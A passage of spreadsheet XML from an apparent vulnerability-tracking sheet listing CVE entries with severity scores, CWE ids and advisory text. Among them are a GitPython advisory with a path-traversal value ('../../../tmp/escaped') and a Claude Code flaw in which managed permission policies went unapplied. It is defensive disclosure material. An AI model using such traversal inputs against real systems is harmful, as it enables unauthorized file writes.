      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in formtools.org Form Tools up to 3.1.1. Impacted is the function smart_fill of the file /global/code/actions.php of the component AJAX Endpoint. This manipulation of the argument url causes server-side request forgery. The attack can be initiated remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103542</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88999</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>The Redux Framework plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.5.14 This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary media library attachments, including administrator-owned files, from the affected site. This is exploitable by Subscribers when a Custom Fonts field is registered on the user profile page via Redux_Users::set_profile(), as doing so causes the required redux_custom_fonts nonce to be rendered into the Subscriber's wp-admin/profile.php page.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88999</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103533</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr">
        <is>
          <t>github, php, requests, hp</t>
        </is>
      </c>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in David-Crty databasement up to 1.7.1. This impacts the function https:/github.com/David-Crty/databasement/pull/511 of the file app/Http/Requests/Api/V1/RestoreRequest.php of the component database-servers API Endpoint. The manipulation of the argument schema_name results in path traversal. The attack may be launched remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been made public and could be used. Upgrading to version 1.7.2 will fix this issue. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103533</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101887</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>BlueALSA (bluez-alsa/bluealsad) contains a division-by-zero vulnerability in the LC3plus sink decoder (a2dp-lc3plus.c, a2dp_lc3plus_dec_thread) that allows a Bluetooth-adjacent attacker to crash the daemon by sending a crafted RTP media header with an attacker-controlled frame count field set to zero. Attackers can establish an A2DP source connection with an LC3plus session negotiated against a victim running bluealsad as an A2DP sink and transmit a non-fragmented LC3plus media header with a zero frame count to trigger a SIGFPE in the decoding thread, causing a denial of service on builds compiled with LC3plus support enabled.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101887</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102138</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator on a node with an optional, separately licensed gateway role enabled could supply a connector URL that the server retrieved without sufficient validation of its scheme or destination, causing the server to issue requests to internal network services. Exploitation requires the licensed gateway role to be active.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102138</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100264</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 stored SMTP server credentials could be disclosed by changing the server host</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100264</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102582</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-425</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. The manual enrolment management page did not properly check whether the manual enrolment plugin was disabled, allowing users with enrolment permissions to access the page directly by navigating to its URL. Consequently, an authorized user could manage manual enrolments even after an administrator disabled the feature in the user interface.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102582</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103114</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in OS4ED openSIS-Classic up to 9.3. The impacted element is the function DBQuery_assignment of the file modules/grades/Assignments.php of the component Assignment Management Endpoint. The manipulation of the argument Tables leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103114</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103116</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in OS4ED openSIS-Classic up to 9.3. This impacts the function DBQuery of the file functions/GetStuListFnc.php of the component Student List Search Endpoint. This manipulation of the argument LO_sort causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103116</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103012</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>98a01053-8a31-4f6d-9aa9-252be161adc6</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-696</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>Claude Code selected an API key stored by Claude Code, for example from an earlier `/login` or written directly to its configuration, ahead of the user's valid Claude Enterprise or Team sign-in when fetching the organization's server-managed settings, even though the session itself authenticated with the Enterprise or Team account. When the settings endpoint rejected that stored key, the session started without the organization's server-managed policy (such as permission deny rules, model restrictions and managed-only locks) or, if a previously cached copy existed on the machine, kept applying that stale copy without receiving later policy changes — while continuing to operate as the organization's account. Triggering this required local access to a device with such a stored API key; the no-policy case additionally required that no managed settings had previously been cached. Endpoint-managed (MDM or file-based) settings were not affected. Claude for Enterprise organizations were affected from version 2.0.68; Claude for Work (Team) organizations from version 2.1.38, when server-managed settings became available to them.
Users on standard Claude Code auto-update have received this fix already. Users performing manual updates are advised to update to version 2.1.260 or later.
Thank you to Tamas Voros / NVIDIA AI Red Team for reporting this issue.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103012</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103113</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in OS4ED openSIS-Classic up to 9.3. The affected element is the function save action of the file modules/students/Student.php of the component General Information Tab. Executing a manipulation of the argument students can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103113</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103117</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in OS4ED openSIS-Classic up to 9.3. Affected is the function db_properties of the file functions/DatabaseInc.php of the component Save Data Handler. Such manipulation of the argument values leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103117</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100689</t>
        </is>
      </c>
      <c r="D170" s="5" t="inlineStr"/>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M170" s="5" t="inlineStr">
        <is>
          <t>3.1.62</t>
        </is>
      </c>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr"/>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>**Affected:** `GitPython` **3.1.61** (latest release) and `main` — `git/objects/submodule/base.py`. `git diff 3.1.61 origin/main -- git/objects/submodule/` is empty, so both are identical here.
---
## The gap
The fix for `GHSA-hmq2-w58f-27jc` added `Submodule._validated_name()` and wired it into `update()` and five siblings, closing the `.gitmodules` **name** → `.git/modules/&lt;name&gt;` traversal. The other attacker-controlled `.gitmodules` field, **`path`**, is read raw:
```python
# git/objects/submodule/base.py:172-177
def _set_cache_(self, attr):
    if attr in ("path", "_url", "_branch_path"):
        reader = self.config_reader()
        self.path = reader.get("path")          # raw .gitmodules value
```
and GitPython's own containment guard is applied in only two of the places that consume it:
```
400: def _to_relative_path(cls, parent_repo, path)      # the guard (abspath + commonpath containment)
542:     path = cls._to_relative_path(repo, path)        # add()   — guarded
1041:    module_checkout_path = self._to_relative_path(self.repo, module_path)   # move() — guarded
```
`update()` validates only the name and then uses the path-derived absolute location directly:
```
788:  self._validated_name(self.name)                    # NAME only
801:  checkout_module_abspath = self.abspath             # derived from self.path — unguarded
821:  os.makedirs(checkout_module_abspath, exist_ok=True)
```
So `path = ../../../tmp/escaped` in an attacker-authored `.gitmodules` selects the directory that gets created and, on the clone path, populated from the submodule URL. The same absolute location is what `force_remove` hands to `shutil.rmtree`.
The asymmetry is the argument: this is not a missing concept — the project wrote `_to_relative_path()` precisely for this, and `add()`/`move()` use it. `update()` does not.
## Honest limits (please read before rating)
- **The most common flow is not affected.** `Repo.clone_from(...)` → `repo.submodules` → `sm.update(init=True)` re-derives `path` from a canonical tree lookup, and real git refuses to check out a tree containing a `..` component, so an evil `.gitmodules` never lands in the working tree in the first place. A reachable trigger therefore requires the victim's code to name a **non-HEAD commit** (a historical-commit API such as `submodule_update(previous_commit=...)`).
- **The researcher did not build that end-to-end trigger.** The researcher only verified first-hand the code above: the guard's two call sites, the name-only validation in `update()`, and the unguarded `abspath` → `os.makedirs()` flow at 3.1.61 == `main`.
## Suggested fix
Apply the guard the project already has, wherever the path is consumed:
```python
# in update(), before deriving abspath (and in any other consumer of self.path):
checkout_rel = self._to_relative_path(self.repo, self.path)   # raises if it escapes the working tree
```
Better still, validate at the boundary: reject a `.gitmodules` entry whose `path` is absolute or contains a `..` component when the section is first read in `_set_cache_()`/`iter_items()`, so no consumer can be added later without the check. A regression test with `path = ../escaped` alongside the existing `name` test would pin both fields.
## Prior art checked
`GHSA-hmq2-w58f-27jc` (this is a residual of its fix, in the sibling field, not a re-report) plus the repository's 30 published advisories — none mentions the `path` field or `_to_relative_path`. Searched issues and PRs for `_to_relative_path`, `gitmodules path` and `submodule traversal`: no report of this.
## Credit
**kta1kri**.
---
## Appendix — `EVIDENCE_gitpython_path_unguarded_20260901.txt` (inlined; advisories accept no attachments)
```text
=== EVIDENCE: GitPython — the .gitmodules 'path' field reaches os.makedirs()/clone unguarded ===
Mon Aug 31 18:45:22 UTC 2026
--- artifact: tag 3.1.61 (latest release); git diff 3.1.61 origin/main -- git/objects/submodule/ is empty ---
--- the containment guard GitPython owns, and its only two call sites ---
33:    _to_relative_path,
400:    def _to_relative_path(cls, parent_repo: "Repo", path: PathLike) -&gt; PathLike:
407:            path = _to_relative_path(parent_repo.working_tree_dir, path)
542:        path = cls._to_relative_path(repo, path)
1041:        module_checkout_path = self._to_relative_path(self.repo, module_path)
--- the parent fix (_validated_name) call sites: it validates the NAME ---
309:    def _validated_name(cls, name: str) -&gt; str:
321:        name = cls._validated_name(name)
541:        cls._validated_name(name)
788:            self._validated_name(self.name)
1040:        self._validated_name(self.name)
1181:        self._validated_name(self.name)
1439:        self._validated_name(self.name)
1440:        self._validated_name(new_name)
1489:        self._validated_name(self.name)
--- update(): name validated, path not; abspath -&gt; os.makedirs ---
        try:
            self._validated_name(self.name)
            # ENSURE REPO IS PRESENT AND UP-TO-DATE
                # END early abort if init is not allowed
                checkout_module_abspath = self.abspath
                module_abspath = self._module_abspath(self.repo, self.path, self.name)
                # ``git submodule deinit`` leaves the repository in
                # ``.git/modules`` and empties the checkout. Reconnect that retained
                # repository instead of trying to clone over it.
                if not dry_run and osp.isdir(module_abspath):
                    try:
                        git.Repo(module_abspath)
                    except InvalidGitRepositoryError:
                        pass
                    else:
                        if osp.lexists(checkout_module_abspath) and (
                            osp.islink(checkout_module_abspath)
                            or not osp.isdir(checkout_module_abspath)
                            or os.listdir(checkout_module_abspath)
                        ):
                            raise OSError(
                                "Module directory at %r does already exist and is non-empty" % checkout_module_abspath
                            )
                        os.makedirs(checkout_module_abspath, exist_ok=True)
                        self._write_git_file_and_module_config(checkout_module_abspath, module_abspath)
                        mrepo = git.Repo(checkout_module_abspath)
--- where self.path comes from (raw .gitmodules value) ---
    def _set_cache_(self, attr: str) -&gt; None:
        if attr in ("path", "_url", "_branch_path"):
            reader: SectionConstraint = self.config_reader()
            # Default submodule values.
            try:
                self.path = reader.get("path")
            except cp.NoSectionError as e:
```</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100689</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
